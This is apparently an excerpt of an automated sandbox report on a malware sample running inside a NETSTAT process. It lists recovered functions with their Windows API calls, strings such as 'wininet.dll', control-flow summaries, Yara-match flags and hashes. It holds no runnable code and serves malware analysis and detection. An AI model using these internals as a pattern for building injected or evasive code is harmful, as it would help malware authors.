                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:C
                                  • API String ID: 2738559852-278173926
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: 17e68fa86f8a719825abd443e563186f8fa84402d9f001efd4fdd55f883f758b
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: 58F0A9B2200109ABDB14DF89DC85DEB77ADAF8C754F158249BA1D97241D630E911CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00438710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 371 438710-438739 call 4391e0 NtClose
                                  APIs
                                  • NtClose.NTDLL(P=C,?,?,00433D50,00000000,FFFFFFFF), ref: 00438735
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID: P=C
                                  • API String ID: 3535843008-381726518
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: 4567df0067dbdee967d52ed57b35c24c5d3ba1ded9ee64c90a31a104e22ed557
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: 5CD012756002146BD710EB99CC45E97775CEF48750F154459BA185B242C570FA00C6E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043883A Relevance: 1.5, APIs: 1, Instructions: 49memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00422D11,00002000,00003000,00000004), ref: 004387F9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: c9ce71e7a4414bb95fc17589061c83829cb9bd23eac757867d227018ff2652ca
                                  • Instruction ID: 1426a1f7f6549cad38c835868ead2a752c1307e16aabc9ddbfe804575b9908c8
                                  • Opcode Fuzzy Hash: c9ce71e7a4414bb95fc17589061c83829cb9bd23eac757867d227018ff2652ca
                                  • Instruction Fuzzy Hash: 5D0116B6200209AFDB14DF88DC81DEB77A9EF88754F118659FA1897241D631ED11CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004387BB Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00422D11,00002000,00003000,00000004), ref: 004387F9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: f61a60d01f2d99f4790b130ff0200a919f9502da97413b66cc1fdfd57f1511bc
                                  • Instruction ID: 0c91a2be2db319d1028905c625fb33e710676f1376ab35637cbaa2099da72e42
                                  • Opcode Fuzzy Hash: f61a60d01f2d99f4790b130ff0200a919f9502da97413b66cc1fdfd57f1511bc
                                  • Instruction Fuzzy Hash: EEF058B1200218ABDB14DF89CC80EAB77ADEF8C744F108159FA08A7241C630F810CBE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004387C0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00422D11,00002000,00003000,00000004), ref: 004387F9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: 45039d414b1e406a57b131ab423a69ac75ea43067f2a0f389b707d5bf933b4b8
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: 38F015B2200209ABDB14DF89CC81EAB77ADAF8C754F118149FE08A7241C630F910CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C99A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 93cd7824ada908a4c545d49a4c66b7a40e26cf0cca1e679267a7eb2f3055738e
                                  • Instruction ID: b2fe7419a41b59a2490d8bbcaefc375df65c0f71a143d86af419e72346f85b77
                                  • Opcode Fuzzy Hash: 93cd7824ada908a4c545d49a4c66b7a40e26cf0cca1e679267a7eb2f3055738e
                                  • Instruction Fuzzy Hash: 179002A1211C0252D20065694C24B07011597D034BFA1C115A0154594CCD5588616561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C99840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 24aaa5e2e0b3e5662507420e4f93f38e4df28cfc7b9597b50e29f129016f52fc
                                  • Instruction ID: d5bafa65418ff5fa0f81d066002b5c9cfc9c0ab59ccb62e2ee2e9746e9fab5d5
                                  • Opcode Fuzzy Hash: 24aaa5e2e0b3e5662507420e4f93f38e4df28cfc7b9597b50e29f129016f52fc
                                  • Instruction Fuzzy Hash: 709002A1242443625545B15944145074116A7E02897E1C012A1414990C89669856E661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C99860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4092d9e64ec30daf70f76dc58fc1e5943dc0ab6bb7a453927aba3b75d9c7c2cb
                                  • Instruction ID: 26d1c1b1b033e916e5c7dabf8ea83231b495c2723d6ebebce8d122b51692edb0
                                  • Opcode Fuzzy Hash: 4092d9e64ec30daf70f76dc58fc1e5943dc0ab6bb7a453927aba3b75d9c7c2cb
                                  • Instruction Fuzzy Hash: DD9002B120140623D11161594514707011997D0289FE1C412A0424598D9A968952B161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C999A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e187acc8b484b1cb983f979c3cd6a5881af2e5c8e134c93e74c4646bc22a71c3
                                  • Instruction ID: 9b04912fdf89dc5139847dd6f87f82deb126d17357ed27c259dd8cdc697b14ba
                                  • Opcode Fuzzy Hash: e187acc8b484b1cb983f979c3cd6a5881af2e5c8e134c93e74c4646bc22a71c3
                                  • Instruction Fuzzy Hash: 859002E134140652D10061594424B070115D7E1349FA1C015E1064594D8A59CC527166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C99910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d148126778e1c952769800953edfa141bda4c775318c40196f93e635f2401026
                                  • Instruction ID: 5cd625387d5bd5d9c05d8faf4f751679da63e5466c6485b06a1d9f8e772e9dde
                                  • Opcode Fuzzy Hash: d148126778e1c952769800953edfa141bda4c775318c40196f93e635f2401026
                                  • Instruction Fuzzy Hash: 499002F120140612D14071594414747011597D0349FA1C011A5064594E8A998DD576A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C996D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 965549c9d6707220f54fecdfe0e39bd2692ac505609fdd43931fb4f3a9b705b4
                                  • Instruction ID: 2574a17aa7b2a40cd9e223ece5b65a926ee509d930d85cd1b055ce3493fdb334
                                  • Opcode Fuzzy Hash: 965549c9d6707220f54fecdfe0e39bd2692ac505609fdd43931fb4f3a9b705b4
                                  • Instruction Fuzzy Hash: ED9002B120140A52D10061594414B47011597E0349FA1C016A0124694D8A55C8517561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C996E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cbff523814e3eb8479d9691ef9dab5fdb15b3961a5e3b354fa90fcebf646e1f7
                                  • Instruction ID: fc2179e2f0c150fdc7c11f0d69bb706d9fcf1ca0ee5500d00a87702c684e2652
                                  • Opcode Fuzzy Hash: cbff523814e3eb8479d9691ef9dab5fdb15b3961a5e3b354fa90fcebf646e1f7
                                  • Instruction Fuzzy Hash: 269002B120148A12D1106159841474B011597D0349FA5C411A4424698D8AD588917161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C99650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 849ff344b445edf3a0956af19abbb0b2cf07766c33dc5f08265bbb0d9828a28d
                                  • Instruction ID: 7f83490c2e7820a369d981bb89e58c35e87dc4e8bafa11ae6a339ba4ecfd00d2
                                  • Opcode Fuzzy Hash: 849ff344b445edf3a0956af19abbb0b2cf07766c33dc5f08265bbb0d9828a28d
                                  • Instruction Fuzzy Hash: 9C9002B120544A52D14071594414A47012597D034DFA1C011A00646D4D9A658D55B6A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C99660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ce3be183866c73e23954fa3ff5a96809236417f4494f1a01f52c90eaae864257
                                  • Instruction ID: b1da9254d40d37b061a5e1a7750f4d1add9d0438132ca1b068ce1edc942f92ad
                                  • Opcode Fuzzy Hash: ce3be183866c73e23954fa3ff5a96809236417f4494f1a01f52c90eaae864257
                                  • Instruction Fuzzy Hash: 249002B120140A12D1807159441464B011597D1349FE1C015A0025694DCE558A5977E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C99FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e814c12c8ec5b7a7480f4b60f54b587a12110f59bb0decd4cee05a513742c759
                                  • Instruction ID: eec22ae3a1301d71a5295bdb57471d7218dd05644339bb0ef2f42d6e520a2414
                                  • Opcode Fuzzy Hash: e814c12c8ec5b7a7480f4b60f54b587a12110f59bb0decd4cee05a513742c759
                                  • Instruction Fuzzy Hash: 229002B131154612D11061598414707011597D1249FA1C411A0824598D8AD588917162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C99780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 219c4c8f016800b952b7e10b175a04f5e961374654be20cc34429b1d24d89dfb
                                  • Instruction ID: 13879a8fc3a402d2d393a5c6062e6568e3c7437e006123a14e459dc5c33da200
                                  • Opcode Fuzzy Hash: 219c4c8f016800b952b7e10b175a04f5e961374654be20cc34429b1d24d89dfb
                                  • Instruction Fuzzy Hash: 9D9002A921340212D1807159541860B011597D124AFE1D415A0015598CCD5588696361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C99710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 46cdadc9f944005fbd9466177eb2634dec22a3e870aaf29a38bfc0bda692a1c2
                                  • Instruction ID: 4ba536cb096c835f49a0a748661e6fcf003ae37776faf91ba1d479b1b6b84ba1
                                  • Opcode Fuzzy Hash: 46cdadc9f944005fbd9466177eb2634dec22a3e870aaf29a38bfc0bda692a1c2
                                  • Instruction Fuzzy Hash: FC9002B120140612D10065995418647011597E0349FA1D011A5024595ECAA588917171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C995D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6ddb66a4bf9ec46515e679e5b859e44e5d463af4239a39f380f63d08e0ad2e16
                                  • Instruction ID: 028564e092faad1b68cb45e72de8c200a4c51c9876c189c3edc42563105342ed
                                  • Opcode Fuzzy Hash: 6ddb66a4bf9ec46515e679e5b859e44e5d463af4239a39f380f63d08e0ad2e16
                                  • Instruction Fuzzy Hash: 899002E120240213410571594424617411A97E0249BA1C021E10145D0DC96588917165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C99540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                  • Associated: 0000000F.00000002.512995461.0000000002D4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2c30000_NETSTAT.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2c413596ad0e29d431be53ad536966aaa5309852519c8d890318c425310d8036
                                  • Instruction ID: 97bc0034ac71b3db4e1c6b4d038b219152b572f4250a2b8954c5113461da88b1
                                  • Opcode Fuzzy Hash: 2c413596ad0e29d431be53ad536966aaa5309852519c8d890318c425310d8036
                                  • Instruction Fuzzy Hash: 999002A5211402130105A5590714507015697D53993A1C021F1015590CDA6188616161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00437300 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 221 437300-43732f 222 43733b-437342 221->222 223 437336 call 43a020 221->223 224 437348-437398 call 43a0f0 call 429b40 call 433e50 222->224 225 43741c-437422 222->225 223->222 232 4373a0-4373b1 Sleep 224->232 233 4373b3-4373b9 232->233 234 437416-43741a 232->234 235 4373e3-437403 233->235 236 4373bb-4373e1 call 436f30 233->236 234->225 234->232 237 437409-43740c 235->237 238 437404 call 437130 235->238 236->237 237->234 238->237
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 004373A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: d34179f70076fde466327a7252c4860807d86dc37bbf3f6fd80d73bb638c78d1
                                  • Instruction ID: 7cd3650fa9717546c7b978540a71b3fee8277de892f39564b81eed4b44f78de8
                                  • Opcode Fuzzy Hash: d34179f70076fde466327a7252c4860807d86dc37bbf3f6fd80d73bb638c78d1
                                  • Instruction Fuzzy Hash: 6931B2B6501704ABC725DF65C8A1FABB7B8BF4C704F00811EFA595B241D734B445CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004372F6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 241 4372f6-437342 call 43a020 245 437348-437398 call 43a0f0 call 429b40 call 433e50 241->245 246 43741c-437422 241->246 253 4373a0-4373b1 Sleep 245->253 254 4373b3-4373b9 253->254 255 437416-43741a 253->255 256 4373e3-437403 254->256 257 4373bb-4373e1 call 436f30 254->257 255->246 255->253 258 437409-43740c 256->258 259 437404 call 437130 256->259 257->258 258->255 259->258
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 004373A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 6ad2ea28845b0b8a86a8688f5771f1d2332bbe270b4ddbf69d29aa2c5490695c
                                  • Instruction ID: b3a556cc70cd3b8f356a3a30baf78e102a537118828931a6993ceaacb9f31cc7
                                  • Opcode Fuzzy Hash: 6ad2ea28845b0b8a86a8688f5771f1d2332bbe270b4ddbf69d29aa2c5490695c
                                  • Instruction Fuzzy Hash: 7821D5B1505700ABC724DF68C8A1F6BB7B4BF88704F04801EFA595B242D774A855CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004388F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 365 4388f0-438906 366 43890c-438921 RtlFreeHeap 365->366 367 438907 call 4391e0 365->367 367->366
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00423B93), ref: 0043891D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: e761f1948cbb3b45177810b6a3ab2b5f3e67f58a9026f052283eec8293d2ae0e
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: 5FE04FB12002056BDB14DF59CC49EA777ACEF88750F014559FD0857241C630F910CAF0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004388B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 362 4388b0-4388e1 call 4391e0 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(65C,?,00433CAF,00433CAF,?,00433536,?,?,?,?,?,00000000,00000000,?), ref: 004388DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 65C
                                  • API String ID: 1279760036-2453901996
                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction ID: bdfecaf50a9b115e2e9612bb8f3ff9f6da308999a15eb2ce376ff992d8bc217c
                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction Fuzzy Hash: BDE046B1200208ABDB14EF99CC45EA777ACEF88754F118559FE086B242CA30F910CBF0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004388EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 368 4388ec-438907 call 4391e0 370 43890c-438921 RtlFreeHeap 368->370
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00423B93), ref: 0043891D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Offset: 00420000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_420000_NETSTAT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
